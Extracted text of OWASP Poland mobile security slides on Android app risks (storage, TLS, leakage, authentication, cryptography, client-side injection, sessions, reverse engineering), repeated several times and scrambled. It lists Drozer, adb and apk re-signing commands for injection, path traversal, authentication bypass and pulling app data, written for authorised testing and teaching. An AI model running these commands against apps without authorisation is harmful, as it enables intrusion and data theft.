Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
